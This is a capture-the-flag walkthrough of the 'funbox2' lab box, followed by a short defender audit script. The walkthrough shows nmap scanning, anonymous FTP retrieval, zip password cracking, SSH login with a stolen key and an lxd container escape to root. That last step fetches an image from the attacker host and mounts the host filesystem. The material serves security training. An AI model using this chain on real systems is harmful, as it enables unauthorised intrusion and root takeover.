1. Find the target's IP address
ip a
Check the network interface
netdiscover -i eth0 -r 192.168.100.0/24
The target's address is 192.168.100.6
2. Scan the target's ports and services with nmap
nmap -sS -Pn -A -p- -n 192.168.100.6
-sS SYN scan (half-open)
-Pn skip the ping (host discovery) phase
-A comprehensive scan
-p- all ports
-n no reverse DNS resolution; when scanning a plain IP range this noticeably speeds up the scan
The target has ports 21/ftp, 22/ssh and 80/http open
3. Information gathering by service
(1) Port 80/http
Visit the page on port 80 and gather information: view the source, run a dirb scan
Nothing useful turned up; there is not much on port 80!
dirb http://192.168.100.6
dirb finds robots.txt, which reveals a logs directory
Check logs:
http://192.168.100.6/logs/
Visiting this directory returns a 404
(2) Port 22/ssh
Usually only brute force is possible, but there is no suitable wordlist; see whether a username and password turn up later
(3) Port 21/ftp
Try anonymous FTP login
ftp 192.168.100.6
Anonymous login succeeds and the FTP server holds many files; get them all
┌──(root㉿kali)-[~]
└─# ftp 192.168.100.6
Connected to 192.168.100.6.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.100.6]
Name (192.168.100.6:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.100.4 !
230-
230-The local time is: Tue Jul 05 06:42:45 2022
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||1516|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4096 Jul 25 2020 .
drwxr-xr-x 2 ftp ftp 4096 Jul 25 2020 ..
-rw-r--r-- 1 ftp ftp 153 Jul 25 2020 .@admins
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
-rw-r--r-- 1 ftp ftp 114 Jul 25 2020 .@users
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
226 Transfer complete
ftp> get anna.zip
local: anna.zip remote: anna.zip
229 Entering Extended Passive Mode (|||21401|)
150 Opening BINARY mode data connection for anna.zip (1477 bytes)
100% |*************************************************************| 1477 108.55 KiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (102.32 KiB/s)
ftp> get ariel.zip
local: ariel.zip remote: ariel.zip
229 Entering Extended Passive Mode (|||57027|)
150 Opening BINARY mode data connection for ariel.zip (1477 bytes)
100% |*************************************************************| 1477 1.29 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (860.09 KiB/s)
ftp> get bud.zip
local: bud.zip remote: bud.zip
229 Entering Extended Passive Mode (|||39230|)
150 Opening BINARY mode data connection for bud.zip (1477 bytes)
100% |*************************************************************| 1477 1.16 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (796.01 KiB/s)
ftp> get cathrine.zip
local: cathrine.zip remote: cathrine.zip
229 Entering Extended Passive Mode (|||39648|)
150 Opening BINARY mode data connection for cathrine.zip (1477 bytes)
100% |*************************************************************| 1477 1.42 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (905.45 KiB/s)
ftp> get homer.zip
local: homer.zip remote: homer.zip
229 Entering Extended Passive Mode (|||49351|)
150 Opening BINARY mode data connection for homer.zip (1477 bytes)
100% |*************************************************************| 1477 1.06 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (764.78 KiB/s)
ftp> get jessica.zip
local: jessica.zip remote: jessica.zip
229 Entering Extended Passive Mode (|||24613|)
150 Opening BINARY mode data connection for jessica.zip (1477 bytes)
100% |*************************************************************| 1477 994.06 KiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (629.86 KiB/s)
ftp> get john.zip
local: john.zip remote: john.zip
229 Entering Extended Passive Mode (|||35794|)
150 Opening BINARY mode data connection for john.zip (1477 bytes)
100% |*************************************************************| 1477 1.05 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (750.45 KiB/s)
ftp> get marge.zip
local: marge.zip remote: marge.zip
229 Entering Extended Passive Mode (|||48076|)
150 Opening BINARY mode data connection for marge.zip (1477 bytes)
100% |*************************************************************| 1477 105.49 KiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (100.46 KiB/s)
ftp> get miriam.zip
local: miriam.zip remote: miriam.zip
229 Entering Extended Passive Mode (|||42020|)
150 Opening BINARY mode data connection for miriam.zip (1477 bytes)
100% |*************************************************************| 1477 1.57 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.03 MiB/s)
ftp> get tom.zip
local: tom.zip remote: tom.zip
229 Entering Extended Passive Mode (|||57570|)
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
100% |*************************************************************| 1477 111.75 KiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (105.62 KiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||37150|)
150 Opening BINARY mode data connection for welcome.msg (170 bytes)
100% |*************************************************************| 170 1.30 MiB/s 00:00 ETA
226 Transfer complete
170 bytes received in 00:00 (232.84 KiB/s)
ftp> get zlatan.zip
local: zlatan.zip remote: zlatan.zip
229 Entering Extended Passive Mode (|||36472|)
150 Opening BINARY mode data connection for zlatan.zip (1477 bytes)
100% |*************************************************************| 1477 1.48 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (955.21 KiB/s)
Unpacking these archives shows that every one is password-protected and every one contains an id_rsa file; the archive names are most likely usernames.
Check the contents of welcome.msg
┌──(root㉿kali)-[~]
└─# cat welcome.msg
Welcome, archive user %U@%R !
The local time is: %T
This is an experimental FTP server. If you have any unusual problems,
please report them via e-mail to <root@%L>.
4. Exploitation
I. Cracking the archive passwords
(1) Using john
Try cracking each archive with john in turn
Only tom.zip cracks successfully
Archive password: iubire
(2) Using fcrackzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u xxx.zip
Trying the archives one by one, only tom's cracks, with the password iubire; unpacking it yields an RSA private key
II. Try logging in over SSH
ssh -i id_rsa tom@192.168.100.6
Login succeeds
III. Privilege escalation
(1) Information gathering: sudo su directly
Look at the user's home directory
ls -al
Check the history file
A username and password are found
tom///xx11yy22!
Check the user's groups:
id
Check sudo rights
sudo -l
sudo su is allowed without a password
(2) lxc privilege escalation
Checking the user's groups also revealed another route to root: lxc privilege escalation
LXC is a lightweight container system shipped with Linux; the lxd daemon runs as root, and with the right steps a member of the lxd group can escalate to root.
One way is to use the LXD API to mount the target host's filesystem into a container, after which the ordinary user is effectively root on the host
The escalation has two steps:
First, in the shell on the Kali side:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python -m SimpleHTTPServer # serve the image with SimpleHTTPServer for a quick file transfer
Then in the shell on the target (this feels very similar to using docker):
wget http://192.168.100.4:8000/alpine-v3.16-x86_64-20220705_2113.tar.gz
lxc image import ./alpine-v3.16-x86_64-20220705_2113.tar.gz --alias rock
lxc image list
lxd init # initialise lxd
lxc init rock shao -c security.privileged=true
lxc config device add shao rock disk source=/ path=/mnt/root recursive=true
lxc start shao
lxc exec shao /bin/sh
Root obtained
Read flag.txt
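As an added defender-side check, not part of the original writeup: the two conditions that made the escalation above trivial, a user in the lxd group and a passwordless sudo rule, can both be found by auditing /etc/group and /etc/sudoers. The script works on constructed samples of those two files so it runs offline; the group ids, rules and user names in them are made up.

```shell
#!/bin/sh
# Added hardening check, not from the original writeup. It flags the two
# conditions that made the escalation trivial on this box: a user in the lxd
# group (root-equivalent, since a privileged container can mount the host's /)
# and a NOPASSWD sudo rule. Inputs are constructed samples in /etc/group and
# /etc/sudoers format so the script runs offline; names are made up.

SAMPLE_GROUP='root:x:0:
sudo:x:27:tom
lxd:x:117:tom,anna
users:x:100:'

SAMPLE_SUDOERS='Defaults env_reset
root    ALL=(ALL:ALL) ALL
tom     ALL=(ALL) NOPASSWD: ALL
%admin  ALL=(ALL) ALL'

# Members of the lxd group, one per line (no output if the group is absent).
lxd_members() {
    printf '%s\n' "$1" |
        awk -F: '$1 == "lxd" && $4 != "" { gsub(",", "\n", $4); print $4 }'
}

# Users or groups holding a NOPASSWD rule, one per line (comments skipped).
nopasswd_principals() {
    printf '%s\n' "$1" | awk '$1 !~ /^#/ && /NOPASSWD:/ { print $1 }'
}

# Report findings; returns 1 if anything was flagged, 0 if clean.
audit() {
    rc=0
    for u in $(lxd_members "$1"); do
        echo "WARN: $u is in the lxd group (lxd runs as root; treat as root-equivalent)"
        rc=1
    done
    for p in $(nopasswd_principals "$2"); do
        echo "WARN: $p may run sudo without a password"
        rc=1
    done
    return $rc
}

# On a real host (as root): audit "$(cat /etc/group)" "$(cat /etc/sudoers)"
audit "$SAMPLE_GROUP" "$SAMPLE_SUDOERS" ||
    echo "Fix: gpasswd -d <user> lxd; remove NOPASSWD from the sudoers rule"
```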
5. Summary
In this box, information gathering and directory scanning led to anonymous FTP login and sensitive files; the archive passwords were cracked with john/fcrackzip; the extracted SSH private key gave an SSH shell; further information gathering on the host yielded credentials, followed by privilege escalation
Host discovery
Port scanning
Directory scanning
Anonymous FTP login
john/fcrackzip cracking, privilege escalation